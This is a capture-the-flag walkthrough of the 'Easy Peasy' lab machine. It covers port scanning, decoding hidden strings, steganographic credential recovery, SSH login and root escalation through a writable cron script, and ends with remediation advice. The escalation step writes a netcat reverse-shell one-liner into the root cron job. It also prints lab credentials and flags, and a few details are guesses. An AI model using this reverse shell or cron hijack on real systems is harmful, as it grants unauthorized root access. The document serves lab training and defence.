Target IP: easypeasy.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Easy Peasy” is a Linux machine hosting multiple web servers (Nginx and Apache) on non-standard ports. The attack path involves extensive enumeration to find hidden directories and encoded strings (Base64, Base62). Credentials for SSH are recovered by performing Steganography on an image found in a hidden directory. Privilege escalation is achieved by exploiting a Cron Job that executes a writable bash script as root.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Discovering high ports (65524).
  • T1027 (Obfuscated Files or Information): Decoding Base62 and ROT13.
  • T1027.003 (Steganography): Extracting data from images (steghide).
  • T1053 (Scheduled Task/Job): Modifying a writable cron script for privilege escalation.

2. Operational Setup

Host Configuration

echo "10.10.x.x easypeasy.thm" | sudo tee -a /etc/hosts

3. Enumeration: “The Multi-Port Hunt”

A. Network Scanning

Your Nmap scan revealed the critical, non-standard port 65524.

nmap -sC -sV -p- -oA nmap/easypeasy easypeasy.thm
  • 80/tcp: Nginx.
  • 6498/tcp: SSH (Non-standard port).
  • 65524/tcp: Apache.

B. Web Enumeration (Port 80 - Nginx)

  • Robots.txt: Reveals /hidden.
  • Flag 1: Viewing the source of /hidden reveals a Base64 string.
echo "ZmxhZ3..." | base64 -d
# Result: Flag 1

C. Web Enumeration (Port 65524 - Apache)

This is where the real breadcrumbs are.

  1. Flag 2 (The Hash): Checking http://easypeasy.thm:65524/robots.txt reveals a hash: a18672860d0510e5ab6699730763b250.
  • Action: Crack it (MD5).
  • Result: flag{1m_s3c0nd_fl4g}.
  1. The Hidden Path (Base62): Viewing the source code of the main page reveals a hidden <p> tag: its encoded with ba..:ObsJmP173N2X6dOrAgEAL0Vu
  • Decoding: This is Base62. (CyberChef is perfect for this).
  • Result: /n0th1ng3ls3m4tt3r.

4. Steganography: The Image

We navigate to http://easypeasy.thm:65524/n0th1ng3ls3m4tt3r.

  • Content: An image binarycodepixabay.jpg.
  • Flag 3: Found in the source code (flag{9fdaf...}).
  • The Password: The page source also contains a hash or binary string that translates to the password for the image. (Likely mypasswordforthatstego or similar).

Extraction

We use Steghide to extract hidden data from the JPG.

steghide extract -sf binarycodepixabay.jpg
# Password: (Recovered from hash)

Result: secrettext.txt containing:

  • User: boring
  • Password: iconvertedmypasswordtobinary (You may need to convert binary to text).

5. Initial Access: SSH

We log in using the non-standard port found in Nmap.

ssh boring@easypeasy.thm -p 6498

User Flag: The user.txt file is present but encoded.

  • Technique: ROT13.
  • Decode: tr 'A-Za-z' 'N-ZA-Mn-za-m' < user.txt.

6. Privilege Escalation: Cron Job

Enumeration

We check for scheduled tasks.

cat /etc/crontab

Output:

* * * * * root /var/www/.mysecretcronjob.sh

The Vulnerability

We check permissions on the script.

ls -la /var/www/.mysecretcronjob.sh
# -rwxr-xr-x 1 boring boring ... .mysecretcronjob.sh

Critical Flaw: The script runs as root, but it is owned and writable by the user boring. We can overwrite it.

Exploitation

We replace the script contents with a reverse shell.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f" > /var/www/.mysecretcronjob.sh

Execution:

  1. Start listener: nc -lvnp 4444.
  2. Wait 60 seconds.
  3. Root Shell.

Root Flag: /root/root.txt.


7. Remediation (Blue Team)

  1. Steganography: While hard to detect, avoid hosting images containing sensitive credentials on public web servers.
  2. Information Disclosure:
  • Remove hidden comments and hashes (robots.txt, HTML comments) from production code.
  • Do not use weak encoding (Base64/Base62) to “hide” directory paths.
  1. Cron Job Permissions:
  • Scripts executed by root must be owned by root and writable only by root (chmod 700 or 744).
  • Use absolute paths in cron scripts to prevent PATH hijacking (though not the issue here, it’s best practice).